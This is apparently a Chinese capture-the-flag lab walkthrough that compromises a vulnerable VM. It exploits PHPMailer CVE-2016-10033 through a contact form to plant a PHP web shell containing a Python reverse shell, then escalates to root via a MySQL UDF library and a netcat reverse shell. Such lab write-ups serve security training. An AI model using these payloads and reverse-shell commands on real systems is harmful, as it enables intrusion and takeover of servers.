前言
这是打靶训练的第26周,难度中,靶机下载
信息搜集
nmap扫描结果
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
45758/tcp open status 1 (RPC #100024) 这111和45758的rpc不懂,来到80端口
dirsearch扫描结果
[13:39:27] 200 - 13KB - /about.html
[13:39:47] 200 - 9KB - /contact.php
[13:39:48] 301 - 312B - /css -> http://10.16.122.110/css/
[13:39:55] 301 - 314B - /fonts -> http://10.16.122.110/fonts/
[13:39:58] 301 - 312B - /img -> http://10.16.122.110/img/
[13:39:59] 200 - 16KB - /index.html
[13:40:01] 200 - 4KB - /js/
[13:40:06] 200 - 626B - /manual/index.html
[13:40:06] 301 - 315B - /manual -> http://10.16.122.110/manual/
[13:40:21] 200 - 16KB - /s.php
[13:40:22] 403 - 301B - /server-status
[13:40:22] 403 - 302B - /server-status/
[13:40:35] 200 - 5KB - /vendor/
[13:40:38] 200 - 2KB - /wordpress/wp-login.php
[13:40:38] 200 - 51KB - /wordpress/ 又是经典的wordpress,wpscan无任何收获。来到vendor目录
/vendor/PATH内容如下
/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21} 拿到flag,并且获取到物理路径为/var/www/html/vendor/
/vendor/SECURITY.md内容如下
PHPMailer versions prior to 5.2.18 (released December 2016) are vulnerable to [CVE-2016-10033](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10033) a remote code execution vulnerability, responsibly reported by [Dawid Golunski](https://legalhackers.com).
PHPMailer versions prior to 5.2.14 (released November 2015) are vulnerable to [CVE-2015-8476](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8476) an SMTP CRLF injection bug permitting arbitrary message sending. 提示PHPMailer有漏洞,有可能这个网站就使用了PHPMailer
/vendor/VERSION内容是5.2.16,我现在90%怀疑它使用了PHPMailer v5.2.16
通过查阅CVE-2016-10033它是因为邮件组件的问题,而在/contact.php下面就有发送邮件系统
通过searchsploit PHPMailer来找对应的漏洞
这里我选择py版本,cp /usr/share/exploitdb/exploits/php/webapps/40974.py .,通过阅读exp,发现不能直接使用,需要进行修改
将target改为PHPMailer所在漏洞网页,如果利用成功马子会上传到10.16.122.110/shell.php。payload connect填反弹shell的ip和端口。fields 中的 email。改成/var/www/html/shell.php,会被写入此物理路径
target = 'http://10.16.122.110/contact.php'
backdoor = '/shell.php'
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'10.16.122.31\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
'name': payload,
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
'message': 'Pwned'} 运行python3 40974.py后,查看马子是否上传成功
开启好监听,再次访问shell.php成功反弹shell
提权
查看进程以root权限运行mysql,可以尝试mysql提权
在/var/www/html/wordpress/wp-config.php发现mysql账号
mysql -u root -p输入密码R@v3nSecurity,连接上mysql
因为mysql版本>=5.1,所以必须把 UDF 的动态链接库.so文件放置于 MySQL 插件文件夹下文件夹下才能创建自定义函数。
插件路径/usr/lib/mysql/plugin/
show variables like '%plugin%';
查找利用文件
λ locate metasploit-framework|grep data/exploits/mysql
/usr/share/metasploit-framework/data/exploits/mysql
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so 靶机是64位的linux,所以要使用lib_mysqludf_sys_64.so。使用nc传到靶机的/tmp目录下
进入mysql输入以下命令进行提权
use mysql;
create table myfunc(line blob);
insert into myfunc values(load_file('/tmp/lib_mysqludf_sys_64.so'));
select * from myfunc into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so'; # 将/tmp/lib_mysqludf_sys_64.so复制到/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so 因为我们没有复制权限,所以借助mysql帮我们完成复制操作
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; 现在执行sys_exec都是以root权限运行了,select sys_exec('nc 10.16.122.31 1234 -e /bin/bash');。反弹一个shell到kali上
在提权中出现了一个小插曲,我将lib_mysqludf_sys_64.so命名成udf.so,竟然提示文件名太短,我看其他师傅都能成功呀,太奇怪了。